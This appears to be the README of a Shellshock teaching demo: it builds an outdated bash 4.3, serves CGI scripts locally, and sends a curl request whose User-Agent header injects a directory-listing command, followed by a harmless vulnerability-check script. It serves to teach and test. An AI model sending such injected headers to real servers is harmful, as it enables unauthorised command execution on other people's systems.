shellshockdemo
- Vulnerable bash version used: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
Setup:
- Clone repository
- Download outdated bash version
  ```sh
  mkdir ~/old-bash && cd ~/old-bash
  curl -O http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
  tar -xzf bash-4.3.tar.gz
  cd bash-4.3
  ```
- Compile bash. Here we ignore some of the compiler errors; these occur because an older C standard is being used.
  ```sh
  CFLAGS="-fcommon -Wno-implicit-function-declaration -Wno-implicit-int" ./configure --prefix=$HOME/old-bash-bin
  make -j$(nproc)
  make install
  ```
- Check bash version (it should be 4.3)
  ```sh
  ~/old-bash-bin/bin/bash --version
  ```
- Replace the shebang in the CGI scripts with the location of your compiled bash and make sure the scripts are executable
  ```sh
  #!/home/yourusername/old-bash-bin/bin/bash
  ```
- Start any HTTP server with CGI scripts enabled in the cloned directory
  ```sh
  python3 -m http.server --cgi 8000
  ```
- Send a malicious HTTP header via curl
  ```sh
  curl -H 'User-Agent: () { :; }; ls -la ../ >> ./feedback.txt' http://0.0.0.0:8000/cgi-bin/submit_feedback.cgi
  ```
If you look at the feedback page, you will see a listing of all files in the parent directory, which means access control has been violated.
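
The `--version` check only confirms the version string. A CGI server hands request headers to the script through environment variables, so what matters is whether a given bash runs a command appended to a function definition it finds there. The script below is an added example, not part of this repository, that tests that behaviour directly; the function names and the `probe` variable are made up for the illustration, and a harmless `echo` stands in for the appended command.

```shell
#!/bin/sh
# Added example, not part of the shellshockdemo repository.
# Behavioural check: does a bash binary run a command that trails a function
# definition imported from an environment variable?

# shellshock_check BASH_PATH
#   returns 0: vulnerable (the trailing command ran during shell startup)
#           1: not vulnerable
#           2: BASH_PATH is not an executable file
shellshock_check() {
    bash_bin=$1
    [ -f "$bash_bin" ] && [ -x "$bash_bin" ] || return 2

    marker="SHELLSHOCK_PROBE_$$"
    # "probe" (a made-up name) plays the role of HTTP_USER_AGENT: text chosen
    # by the client that ends up in the environment of the CGI interpreter.
    # A harmless echo stands in for the appended command.
    out=$(env "probe=() { :; }; echo $marker" "$bash_bin" -c ':' 2>/dev/null) || true

    case $out in
        *"$marker"*) return 0 ;;
        *)           return 1 ;;
    esac
}

# report BASH_PATH: print a one-line verdict for the binary.
report() {
    rc=0
    shellshock_check "$1" || rc=$?
    case $rc in
        0) echo "$1: VULNERABLE, do not use as a CGI interpreter outside the lab" ;;
        1) echo "$1: not vulnerable" ;;
        *) echo "$1: not an executable file" ;;
    esac
}

# Check every path given on the command line, for example the freshly built
# ~/old-bash-bin/bin/bash next to the system /bin/bash.
for candidate in "$@"; do
    report "$candidate"
done
```

Saved under a name of your choice and run with both paths as arguments, it should flag the compiled 4.3 binary and report a patched system bash as not vulnerable.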